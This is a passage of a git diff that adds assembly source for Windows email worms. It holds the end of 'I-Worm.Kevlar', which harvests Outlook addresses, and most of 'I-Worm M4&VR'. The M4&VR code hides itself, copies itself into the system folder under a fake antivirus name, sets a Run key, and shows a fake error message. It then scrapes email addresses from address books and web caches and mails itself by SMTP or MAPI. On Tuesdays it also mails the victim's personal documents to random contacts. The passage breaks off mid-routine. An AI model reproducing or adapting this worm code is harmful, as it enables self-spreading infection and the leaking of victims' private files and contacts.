09h,09h,"Bye and have a nice day.",00h +NameFrom db "Your friend",00h + + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd NameFrom + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset m_addr + dd offset m_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset CopyName2 + dd ? + dd ? + + + +htmd: +db 'PetiKVX come back',0dh,0ah +db '',00h +HTMSIZE = $-htmd + +vbsd: +db 'On Error Resume Next',0dh,0ah +db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah +db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah +db 'c.Close',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'For O = 1 To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah +db 'c.WriteLine P.Address',0dh,0ah +db 'c.Close',0dh,0ah +db 'Next',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah +db 'c.WriteLine "!"',0dh,0ah +db 'c.Close',0dh,0ah +VBSSIZE = $-vbsd + +signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h + + +MAX_PATH equ 260 +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +Search WIN32_FIND_DATA <> + + +end DEBUT +end \ No newline at end of file diff --git a/Win32/I-Worm.M4&VR.asm b/Win32/I-Worm.M4&VR.asm new file mode 100644 index 00000000..803a8818 --- /dev/null +++ b/Win32/I-Worm.M4&VR.asm @@ -0,0 +1,2048 @@ +;----------------------------------------------------------------------------- +;------------------------------- ----------------------------------------- +;----------------------------- --------------------------------------- +;--------------------------- I-Worm M4&VR ------------------------------------ +;----------------------------- --------------------------------------- +;------------------------------- ----------------------------------------- +;----------------------------------------------------------------------------- + +.386p +.model flat + +;--------------------------- Include Zone ------------------------------------ + +MEM_COMMIT equ 00001000h +MEM_RESERVE equ 00002000h +PAGE_READWRITE equ 00000004h +PAGE_READONLY equ 00000002h +FILE_ATTRIBUTE_NORMAL equ 080h +OPEN_EXISTING equ 03h +FILE_SHARE_READ equ 01h +GENERIC_READ equ 80000000h +FILE_MAP_WRITE equ 00000002h +FILE_MAP_READ equ 00000004h +CREATE_ALWAYS equ 2 +GENERIC_WRITE equ 40000000h + +;-------------------------- Macro Zone --------------------------------------- + +@INIT_SehFrame macro Instruction + local OurSeh + call OurSeh + mov esp,[esp+08h] + Instruction +OurSeh: + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + endm + +@REM_SehFrame macro + xor edx,edx + pop dword ptr fs:[edx] + pop edx + endm + +@pushsz macro string + local Str + call Str + db string,0 +Str: endm + +api macro a + extrn a:PROC + call a + endm + +;------------------------ Constantes Zone ------------------------------------ + +SEH equ 1 ; SEH protection + +NbEmailWanted equ 150 ; Nb Email to Seek >1 +EmailSize equ 64 ; Attention rol eax,6 (2^6) +EmailFileSize equ (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security) +NbToSend equ 20 ; Send x emails per session + +NbPersoWanted equ 20 ; Nb Personal document to Seek +PersoSize equ 256 ; Attention rol eax,8 (2^8) +PersoFileSize equ (PersoSize*(NbPersoWanted+1)) ; For VirtualAlloc (+Security) + +MimeHeaderSize equ 1024 ; Mime Header size + +;----------------------------------------------------------------------------- +;--------------------------- Code Zone --------------------------------------- +;----------------------------------------------------------------------------- + +.code + +Mv: + pushad + + IF SEH + @INIT_SehFrame ; Init SEH + ENDIF + +;------------------------- Check & Mark Presency ----------------------------- + +TryToOpenOurMutex: + xor eax, eax + @pushsz 'MvMutex' ; Mutex Name + push eax + push eax + api OpenMutexA ; already in mem + or eax,eax + jnz ExitMv ; Yes, do nothing more + +CreateOurMutex: + xor eax, eax + @pushsz 'MvMutex' ; Mutex Name + push eax ; No owner + push eax ; default security attrib + api CreateMutexA ; create Our Mutex + mov dword ptr[MutexHdl], eax + +;---------------------------- Random Init ------------------------------------ + +RandomInit: + api GetTickCount + mov RandomNb, eax + +;---------------------- Hide Process on Win9x -------------------------------- + +HideProcess: + @pushsz "KERNEL32.dll" + api GetModuleHandleA + @pushsz "RegisterServiceProcess" ; Error on NT + push eax + api GetProcAddress + test eax, eax + jz GetOurPathName + push 01h + push 00h + call eax + +;----------------------- Copy Worm in Sys Dir -------------------------------- + +GetOurPathName: + xor eax, eax + push eax + api GetModuleHandleA ; Our Handle + push 260 + push offset MyPath + push eax + api GetModuleFileNameA ; Our Path + +CreateDestPath: + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + + @pushsz '\NETAV.EXE' + push offset TempPath&Name + api lstrcat ; Path+Name of File to Create + +CheckHowExecuted: + push offset MyPath + push offset TempPath&Name + api lstrcmp + test eax, eax + jz AutoRun + +CreateOurFile: + xor eax, eax + push eax ; Overwrite mode set + push offset TempPath&Name + push offset MyPath + api CopyFileA ; Copy Worm in Sys Dir + + +;------------------------- Registry Worm ------------------------------------- + +RegWorm: + push offset TempPath&Name + api lstrlen + push eax + push offset TempPath&Name + push 1 + @pushsz "NETAV Agent" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + api SHSetValueA + +;-------------------- First Launch Fake Message ------------------------------ + +FakeMessage: + push 1040 + @pushsz 'Setup' + @pushsz 'This file does not work on this system' + push 0 + api MessageBoxA + +;---------------------- Check Email File & Create ---------------------------- +AutoRun: + +CheckEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + + push offset TempPath&Name + api SetCurrentDirectoryA ; Set sys dir + + push offset search ; Push it + @pushsz 'ICMAIL.DLL' ; Mask + api FindFirstFileA ; find file + inc eax + jnz UpDateEmailList ; The File Exist + + call CreateEmailFile ; Create It if Does not exist + +;----------------------- Check if Update Time -------------------------------- + +UpDateEmailList: + lea esi,SystemTimeData + push esi + api GetSystemTime + + movzx edx, word ptr[esi+4] ; Esi point day of week + cmp edx, 4 ; Jeudi ? + jne Check_if_Connected ; No + + call CreateEmailFile ; Yes, Update Email File + +;-------------------------- Spread the Worm ---------------------------------- + +Check_if_Connected: + push offset SystemTimeData + api GetSystemTime + + push 0 + push offset IConnectedStateTemp + api InternetGetConnectedState + dec eax + jnz No_internet ; No connection + + call SendEmail ; Send Wab Emails + Rnd Email + jmp ExitMvMutex ; Then Bye + +No_internet: + push 5*60*1000 ; 5 min + api Sleep + jmp Check_if_Connected + +;----------------------------- The End --------------------------------------- + +ExitMvMutex: + push dword ptr[MutexHdl] + api CloseHandle + +ExitMv: + call FreeTheMem + + IF SEH + @REM_SehFrame ; Restore SEH + ENDIF + + popad + + push 0 + api ExitProcess ; Quit + + + db '---iworm.mv4&vr.by.tony/mvcrew---',0dh,0dh + + +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- +;------------------------- Sub Routine Zone ---------------------------------- +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- + + +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +;........................ Major Sub Routine .................................. +;............................ Z O N E ........................................ +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + + +;...................... Create The Email File ................................ +;............................................................................. + +; OUT : Email File in System Dir : ICMAIL.DLL + +CreateEmailFile: + mov dword ptr[NbEmailFound], 0 + +ReserveMem_For_EmailListe: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push EmailFileSize + push eax ; System decide where + api VirtualAlloc + or eax,eax + jz EmailFileError ; Alloc Fail + mov dword ptr[EmailList], eax + +EmailSeeker: + call SearchWabFile_Email ; Search Email address book + call SearchHtmFile_Email ; Search Email HTML + +CreateTheEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + @pushsz '\ICMAIL.DLL' + push offset TempPath&Name + api lstrcat ; Path+Name of File to Create + xor eax,eax + push eax + push eax + push CREATE_ALWAYS + push eax + push FILE_SHARE_READ + push GENERIC_WRITE + push offset TempPath&Name + api CreateFileA + inc eax + jz EmailFileError + dec eax + mov [TempFileHandle], eax + + push 0 + push offset ByteWritten + push EmailFileSize ; Copy Listes d'Emails + push dword ptr [EmailList] + push [TempFileHandle] + api WriteFile + + push dword ptr [TempFileHandle] + api CloseHandle + +EmailFileError: + ret + + +;........................ Find Email in HTML ................................. +;............................................................................. + +; Recursive Search from Internet Path for Email in Html + +SearchHtmFile_Email: + call Clear_TempPath&Name + + push 00h + push 20h ; Internet Path + push offset TempPath&Name + push 00h + api SHGetSpecialFolderPathA + + push offset TempPath&Name + api SetCurrentDirectoryA ; Selected dir = Internet Path + + lea eax, SeekHtmlCurrentDir + mov dword ptr[RoutineToCall], eax + call AllSubDirSearch ; Action = SeekHtmlCurrentDir + ret + +;.............. Seek Html in Current Dir + +; IN: Selected Current dir +; OUT: Emails in reserved Mem + +SeekHtmlCurrentDir: + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je HtmlEmailSearchEnd ; YES... + + lea edi, search + push edi + @pushsz '*.*htm*' + api FindFirstFileA + inc eax + jne SeekEmail_Html + ret + +SeekEmail_Html: + dec eax + xchg eax,esi + +SeekEmail_Html_Loop: + + call SeekEmail_In_ThisHtml ; Parse Html 4 emails + + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je HtmlEmailSearchFin ; YES... + + push edi + push esi + api FindNextFileA + dec eax + je SeekEmail_Html_Loop + +HtmlEmailSearchFin: + push esi + api FindClose +HtmlEmailSearchEnd: + ret + +;.............. Parse Html for emails + +SeekEmail_In_ThisHtml: + pushad + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push FILE_SHARE_READ + push GENERIC_READ + lea eax, [search.FileName] + push eax + api CreateFileA + inc eax + je HtmlEmailSearchEnd ; Only ret for the call + dec eax ; Not the total end + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push PAGE_READONLY + push eax + push ebx + api CreateFileMappingA + test eax,eax + je CloseHtmlHandle + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push FILE_MAP_READ + push ebp + api MapViewOfFile + test eax,eax + je CloseHtml_MapHandle + xchg eax,esi + mov [maphandlemail],esi + mov [esi_save],esi + + push 0 + push ebx + api GetFileSize + xchg eax,ecx + jecxz CloseHtml_MapViewHandle + inc ecx + jz CloseHtml_MapViewHandle ; GetFileSize Error ? + dec ecx +FixBugOverflow: + sub ecx, 8 + cmp ecx, 0 + jl CloseHtml_MapViewHandle + +SeekMailToStr: + mov esi,[esi_save] + call MTStr + db 'mailto:' +MTStr: + pop edi + +ScanFor_MailTo: + pushad + push 7 + pop ecx + rep cmpsb ; search for "mailto:" + popad ; string + je MailToFound_CheckEmail ; check the mail address + inc esi + dec ecx + jnz ScanFor_MailTo + +CloseHtml_MapViewHandle: + push [maphandlemail] + api UnmapViewOfFile +CloseHtml_MapHandle: + push ebp + api CloseHandle +CloseHtmlHandle: + push ebx + api CloseHandle + popad + ret + +MailToFound_CheckEmail: + inc esi + mov [esi_save],esi + dec esi + + mov edi, dword ptr [EmailList] + mov edx, dword ptr [NbEmailFound] + rol edx, 6 ; 64 = email size stockage + add edi, edx ; goto next place + + mov [EmailCurrentPos], edi + + xor edx,edx + add esi,7 + push edi ; mail address + +NextChar: + lodsb + cmp al, ' ' + je SkipChar + + cmp al, '"' ; eMail End ? + je EndChar + cmp al, '?' ; eMail End ? + je EndChar + cmp al, '>' ; eMail End ? + je EndChar + cmp al, '<' ; eMail End ? + je EndChar + cmp al, ']' ; eMail End ? + je EndChar + cmp al, '''' ; eMail End ? + je EndChar + + cmp al, '@' ; Valid email ? + jne CopyChar + inc edx +CopyChar: + stosb + jmp NextChar +SkipChar: + inc esi + jmp NextChar +EndChar: + xor al,al + stosb + pop edi + test edx,edx ; if EDX=0, mail is not + je SeekMailToStr ; valid (no '@') + + cmp dword ptr [NbEmailFound], 0 + je NoEmailYet + + mov edi, [EmailCurrentPos] + mov eax, [edi] + sub edi, 64 + cmp eax, [edi] + je SeekMailToStr + +NoEmailYet: + inc dword ptr [NbEmailFound] + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je CloseHtml_MapViewHandle ; YES... + + jmp SeekMailToStr ; get next email address + + +;........................ Find Email in WAB .................................. +;............................................................................. + +SearchWabFile_Email: + call Clear_TempPath&Name + +GetWabPath: + mov dword ptr[KeySize], 260 ; Init Size to get + + push offset KeySize + push offset TempPath&Name + push offset Reg + push 0 + @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" + push 80000001h + api SHGetValueA + test eax, eax + jne EndWab + +Open&Map_WabFile: + call Open&MapFile + jc EndWab + +WabSearchEmail: + mov ecx, [eax+64h] ; Nb of address + jecxz WabUnmapView ; No address + mov dword ptr[NbEmailFound], ecx ; For the Html search + mov [NbWabEmail],ecx ; For the emailfile +TruncFriend: + cmp ecx, NbEmailWanted ; Too many Friend + jbe NotManyFriend + mov ecx, NbEmailWanted ; To many @, reduce it + dec ecx ; for Html search (inc [NbEmailFound]!) + mov dword ptr[NbEmailFound], ecx ; For the Html search + mov [NbWabEmail],ecx ; For the emailfile +NotManyFriend: + mov esi, [eax+60h] ; email @ array + add esi, eax ; normalise + mov edi, dword ptr[EmailList] ; where store email + +GetWabEmailLoop: + call StockWabEmail + dec ecx + jnz GetWabEmailLoop + +WabUnmapView: + call Open&MapFileUnmapView + +EndWab: + ret + +StockWabEmail: + push ecx esi + push 40h + pop ecx + cmp byte ptr [esi+1],0 + jne StockWabEmailLoop + +StockWabEmailUnicodeLoop: + lodsw ; Unicode + stosb ; Ansi + dec ecx + test al, al + jne StockWabEmailUnicodeLoop + add edi, ecx ; next email field in Dest + pop esi ecx + add esi, 44h ; next email field in Wab + ret + +StockWabEmailLoop: + movsb ; Ansi + dec ecx + test al, al + jne StockWabEmailLoop + add edi, ecx ; next email field in Dest + pop esi ecx + add esi, 24h ; next email field in Wab + ret + +;..................... Send Email SMTP or MAPI ............................... +;............................................................................. + +; OUT: Send via SMTP or MAPI #NbToSend Ramdom EmailAddress from EmailFile + + +SendEmail: + call MapEmailFile ; Map The Email File + jnc HowToSend + ret + +HowToSend: + mov byte ptr[SmtpFlag], 0 ; init flag to 0 + call GetUserSmtpServer ; Default Smtp Serveur Found ? + jc MapiSendVersion ; No + not byte ptr[SmtpFlag] ; flag = 1 + +MapiSendVersion: + not byte ptr[SmtpFlag] ; flag=0 if SMTP, flag=1 -> MAPI + +MapEmailFileOk: + lea esi, SystemTimeData + movzx ecx, word ptr[esi+4] ; Esi point day of week + cmp ecx, 2 ; Mardi + jne _NormalSend + mov byte ptr[PayloadFlag], 1 + call PersonalDocSearch ; Personal doc path in mem + +_NormalSend: + call NormalSendInit ; init attachement 4 Normal Send + + mov ebx, NbToSend ; Send NbToSend emails per session +SendRandomEmailLoop: + call SelectEmail ; return email ads in esi + jecxz SendBye ; EmailFile empty or NonExploitable + + lea edi, CurrentEmail ; <----------------- + mov ecx, EmailSize ; | + rep movsb ; Copy rnd Email in | + + xor al, al + sub esi, EmailSize + xchg edi, esi + mov ecx, EmailSize + rep stosb ; Remove email sent in EmailFile + +PaySendTime: + cmp byte ptr[PayloadFlag], 0 + je NormalSend + call PayloadSendInit ; Personals doc name in MyPath + +NormalSend: + call BuildMessageHeader ; build the mime header + + cmp byte ptr[SmtpFlag], 0 + jne MapiSendIt ; flag=1 -> MAPI + + call SmtpConnection + jc MapiSendIt ; smtp error -> mapi send + call SmtpSendCommand + jc MapiSendIt ; smtp error -> mapi send + call SmtpDisConnection + jmp SendNext ; If here No Mapi Needed + +MapiSendIt: + call MapiSend + +SendNext: + cmp byte ptr[PayloadFlag], 0 + je NormalSendNext + call ReleasePayMem +NormalSendNext: + call ClearHeaderMem + dec ebx + jnz SendRandomEmailLoop ; Send #NbToSend emails + +SendBye: + jmp Open&MapFileUnmapView ; Clean De-map EmailFile + + +;.............. Select Email to Send + +; OUT: esi point on the email +; ecx = 0 if error +; select first the email from the *.WAB + +SelectEmail: + mov ecx, NbEmailWanted + inc ecx +SelectIT: + dec ecx + jz SelectEmailError + + mov esi, dword ptr [mapaddress] ; emails from file in memory + + mov edi, NbEmailWanted ; Rnd Range + call GetRndNumber ; Rnd Nb in edx + + cmp dword ptr[NbWabEmail], 0 + je TriEMails + + dec dword ptr[NbWabEmail] + mov edx, dword ptr[NbWabEmail] + +TriEMails: + rol edx, 6 ; edx*emailsize (64) + add esi, edx ; esi on the email + + mov eax, dword ptr [esi] + test eax, eax ; No empty email + je SelectIT + mov eax, dword ptr [esi] + or eax, 20202020h ; Lower case + cmp eax, 'mbew' ; No webmaster@xxxxxxxx + je SelectIT + mov eax, dword ptr [esi] + or eax, 20202020h ; Lower case + cmp eax, 'ptth' ; No http:\\xxxxxxxxxxx + je SelectIT +SelectEmailError: + ret + +;.............. Normal Init The Attachement File + +; Routine appele tout le temps (Payload ou pas) -> Init du mess: header + body + +NormalSendInit: + +InitWhoSendName: + call ResMemHeader ; Some Mem for the mime header + + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset mailfrom + push offset Reg + @pushsz "SMTP Email Address" ; User mail (for mail from:) + lea eax, AccountKey + push eax + push 80000001h + api SHGetValueA + test eax, eax + je InitWormName + mov byte ptr[UserEmailFoundFlag], 1 + +InitWormName: + xor al,al + mov ecx,260 + lea edi, MyPath + rep stosb + + push 260 + push offset MyPath + api GetSystemDirectoryA ; System Dir + + @pushsz '\NETAV.EXE' + push offset MyPath + api lstrcat ; Path+Name 4 Mapi Send&Smtp CodeB64File + +SmtpNormalSendInit: + call CodeB64File ; return worm file encoded in mem + + ret + +;.............. Build Message Header + +BuildMessageHeader: + push ebx ; for the loop + + cmp byte ptr[UserEmailFoundFlag], 0 + je BuildHeader + +CreateNameFrom: + xor al, al + lea edi, mailfrom + mov ecx, EmailSize + rep stosb + + push NbFromName ; nb name + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFromNameTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Name offset + mov edi, [edi] + + push edi ; User mail not found -> fix another name + push offset mailfrom + api lstrcat + +CreateServFrom: + push NbFromServ ; nb serv + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFromServTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Serv offset + mov edi, [edi] + + push edi ; User mail not found -> fix another name + push offset mailfrom + api lstrcat + +BuildHeader: + mov esi, dword ptr[MemMessageBody1] ; some mem + +BuildFrom: + @pushsz 'From: ' ; From: + push esi + api lstrcat + + push offset mailfrom ; user mail or another fixed + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildTo: + @pushsz 'To: ' ; To: + push esi + api lstrcat + + push offset CurrentEmail ; Email found in *.wab or Html + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildSubject: + @pushsz 'Subject: ' ; Subject: + push esi + api lstrcat + + push NbSubject ; nb Subject + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndSubjectTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Subject offset + mov edi, [edi] + + push edi ; Rnd Subject + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildBody: + push offset MessageBody1 ; Mime bordel jusqu'a -> email message + push esi + api lstrcat + +BuiltEmailMessage: + push NbRndText ; nb Text + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndTextTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Text offset + mov edi, [edi] + + push edi ; Rnd Text + push esi + api lstrcat + +BuildBody1b: + push offset MessageBody1b ; email message -> name= + push esi + api lstrcat + + cmp byte ptr[PayloadFlag],0 + jne BuildFileNamePay + +BuildFileNameNormal: + push NbRndFileName ; nb FileName + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFileNameTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Text offset + mov edi, [edi] + + push edi ; Rnd File in name= + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + + push offset MessageBody1c ; .EXE",CRLF -> filename= + push esi + api lstrcat + + push edi ; Rnd File in filename= + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + @pushsz CRLF + push esi + api lstrcat + + jmp BuildSizeBody1 + +BuildFileNamePay: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + push offset MyPath + api GetFileTitleA + + @pushsz '"' + push esi + api lstrcat + + push offset TempPath&Name + push esi + api lstrcat + + @pushsz '"' + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + + push offset MessageBody1c ; .EXE",CRLF -> filename= + push esi + api lstrcat + + @pushsz '"' + push esi + api lstrcat + + push offset TempPath&Name + push esi + api lstrcat + + @pushsz '"' + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + @pushsz CRLF + push esi + api lstrcat + +BuildSizeBody1: + push esi + api lstrlen + + mov dword ptr[MessageSize1], eax ; Header+Mime bordel lenght for send cmd + +BuildMessageHeaderError: + pop ebx ; for the loop + ret + +;.............. Payload Init The Attachement File + +PayloadSendInit: + push ebx ; For The send Loop + + mov edi, dword ptr[NbPersonalFound] ; Rnd Range + call GetRndNumber ; Rnd Nb in edx + +PayMapiSendInit: + xor al,al + mov ecx,260 + lea edi, MyPath + rep stosb + + mov esi, dword ptr [PersoDocListe] + rol edx, 8 + add esi, edx ; esi = perso doc path + lea edi, MyPath + mov ecx, 256 ; Perso path size + rep movsb + +PaySmtpSendInit: + call CodeB64File ; return perso file encoded in mem + + pop ebx ; For The send Loop + ret + +;.............. Some Mem For The Mime Header + +ReleasePayMem: + push ebx + + mov ecx, dword ptr [MemEncoded] + call MemFreeIt + mov ecx, dword ptr [MemToEncode] + call MemFreeIt + + pop ebx + ret + +ClearHeaderMem: + xor al,al + mov ecx, MimeHeaderSize + mov edi, dword ptr[MemMessageBody1] + rep stosb + ret + +;.............. Some Mem For The Mime Header + +ResMemHeader: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push MimeHeaderSize + push eax ; System decide where + api VirtualAlloc + mov dword ptr[MemMessageBody1], eax + ret + +;.............. Map The Email File + +;OUT: eax = mapaddress +; cf = 0 if no error + +MapEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA + @pushsz '\ICMAIL.DLL' + push offset TempPath&Name + api lstrcat ; Path+Name + + call Open&MapFile + ret + + +;.......................... Send Via MAPI .................................... +;............................................................................. + + +MapiSend: + push ebx ; For The send Loop + + xor eax, eax + push eax + push eax + push offset MapiMessage + push eax + push dword ptr [MAPISession] + api MAPISendMail + + pop ebx ; For The send Loop + ret + + +;........................... Send via SMTP ................................... +;............................................................................. + +; 4 Part: +; - GetLocalSmtpServeur: Find default SMTP server +; - SmtpConnection: Init Socket + Connect to Smpt host +; - SmtpSendCommand: Send all the commands +; - SmtpDisConnection: Clean + Disconnect + + +;.............. Get User Server + +GetUserSmtpServer: + +GetUserInternetAccount: + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset AccountSubKey + push offset Reg + @pushsz "Default Mail Account" + @pushsz "Software\Microsoft\Internet Account Manager" + push 80000001h + api SHGetValueA + test eax, eax + jne GetUserSmtpServerError + +GetUserInternetServer: + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset SmtpServeur + push offset Reg + @pushsz "SMTP Server" + lea eax, AccountKey + push eax + push 80000001h + api SHGetValueA + test eax, eax + jne GetUserSmtpServerError + clc + ret +GetUserSmtpServerError: + stc + ret + +;.............. Smtp Connection + +SmtpConnection: + pushad + push offset WSAData ; Struct WSA + push 101h ; VERSION1_1 + api WSAStartup ; Socket Init + test eax,eax ; ok ? + jne WSA_Error ; No, exit with stc + + push 0 ; Protocol = 0 (more sure) + push 1 ; SOCK_STREAM + push 2 ; AF_INET (most used) + api socket ; create socket + inc eax ; -1 = error + je Socket_Error ; WSACleanUp and stc + dec eax + mov [hSocket],eax ; Socket Handle + + push 25 ; Smtp port + api htons ; Convert it + mov word ptr[wsocket+2], ax ; The port ( 2 ptr[wsocket]=AF_INET ) + + push offset SmtpServeur ; The SMPT Host + api gethostbyname ; SMPT to IP + test eax,eax ; error ? + je Error_CloseSocket&CleanUp ; Exit + stc + mov eax,[eax+10h] ; get ptr 2 IP into HOSTENT + mov eax,[eax] ; get ptr 2 IP + mov [ServeurIP],eax ; Save it + + push 010h ; size of sockaddr struct + push offset wsocket ; Ptr on it + push [hSocket] ; Handle + api connect ; connect to smtp server + inc eax + je Error_CloseSocket&CleanUp ; Exit + stc + call GetServeurReply ; get server response + jc Error_CloseSocket&CleanUp ; If c=0 Connection OK ! + popad + clc + ret + +GetServeurReply: + push 0 ; Flags + push 4 ; Get a LongWord + push offset ServeurReply ; in ServeurReply + push [hSocket] + api recv ; get stmp server error code + cmp eax, 4 ; Receive a LongWord + jne ReplyError ; No, stc + +ServeurReplyLoop: + mov ebx, offset ServeurReplyEnd ; Get a byte In + push 0 ; Flags + push 1 ; a byte + push ebx + push [hSocket] + api recv + jne ReplyError + + cmp byte ptr [ebx], 0Ah + jne ServeurReplyLoop ; skip over CRLF + + mov eax, [ServeurReply] + cmp eax, ' 022' + je ReplyOk + cmp eax, ' 052' + je ReplyOk + cmp eax, ' 152' + je ReplyOk + cmp eax, ' 453' + jne ReplyError +ReplyOk: + clc + ret +ReplyError: + stc + ret + +;.............. Smtp DisConnection + +SmtpDisConnection: + pushad +Error_CloseSocket&CleanUp: + push dword ptr [hSocket] + api closesocket +Socket_Error: + api WSACleanup +WSA_Error: + popad + stc + ret + +;.............. Smtp Send + +SmtpSendCommand: + pushad + +SendHelloCmd: + mov esi,offset cmd_helo ; 'HELO xxx',CRLF + push 14 ; cmd size + pop ecx ; cmd size + call SendSocket ; send HELO command + call GetServeurReply ; Ok ? + jc Error_CloseSocket&CleanUp ; No + +SendMailFromCmd: + mov esi,offset cmd_mailfrom ; 'MAIL FROM:<' + push 11 ; cmd size + pop ecx ; size + call SendSocket ; send MAIL FROM command + + mov esi,offset mailfrom ; ptr default user email + push esi + api lstrlen + xchg ecx, eax + call SendSocket ; 2 Write xxxx@xxxx.xx + + call Brk1 + db '>',CRLF +Brk1: pop esi + push 3 + pop ecx + call SendSocket ; 3 Write '>',CRLF + + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendRcptToCmd: + mov esi,offset cmd_rcptto ; 'RCPT TO:<' + push 9 ; cmd size + pop ecx ; cmd size + call SendSocket ; 1 Write 'RCPT TO:<' + + mov esi,offset CurrentEmail ; ptr email + push esi + api lstrlen + xchg ecx, eax + call SendSocket ; 2 Write xxxx@xxxx.xx + + call Brk2 + db '>',CRLF +Brk2: pop esi + push 3 + pop ecx + call SendSocket ; 3 Write '>',CRLF + + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendDataCmd: + mov esi,offset cmd_data ; 'DATA',CRLF + push 6 ; Size + pop ecx ; Size + call SendSocket ; send DATA command + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendeMailBody: + mov esi, dword ptr[MemMessageBody1] ; Start Message Body + mov ecx, dword ptr[MessageSize1] + call SendSocket + + mov esi,dword ptr [MemEncoded] ; Encoded File + mov ecx,dword ptr [EncodedFileSize] + call SendSocket + + mov esi, offset MessageBody2 ; End Message Body + mov ecx, MessageSize2 + call SendSocket + +SendTermCmd: + mov esi,offset cmd_term ; CRLF,'.',CRLF + push 5 ; size + pop ecx ; size + call SendSocket ; send message header+body + call GetServeurReply ; Ok ? + jc Error_CloseSocket&CleanUp ; No + +SendQuitCmd: + mov esi,offset cmd_quit ; 'QUIT',CRLF + push 6 ; size + pop ecx ; size + call SendSocket ; send QUIT command + popad + clc + ret + +SendSocket: + push 0 ; Flags + push ecx ; size + push esi ; Source + push [hSocket] ; Handle + api send + ret + + +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +;........................ Minor Sub Routine .................................. +;............................ Z O N E ........................................ +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + + +;........................ Open & Map a File .................................. +;............................................................................. + + +; IN: TempPath&Name = Path + Name of file to Open +; OUT: fhandle, maphandle, mapaddress +; cf = 0 ou 1 + +Open&MapFile: + xor eax,eax + push eax + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax + push FILE_SHARE_READ + push GENERIC_READ or GENERIC_WRITE + push Offset TempPath&Name + api CreateFileA + inc eax + je Open&MapFileError + dec eax + mov dword ptr [fhandle], eax + + xor eax,eax + push eax + push eax + push eax + push PAGE_READWRITE + push eax + push dword 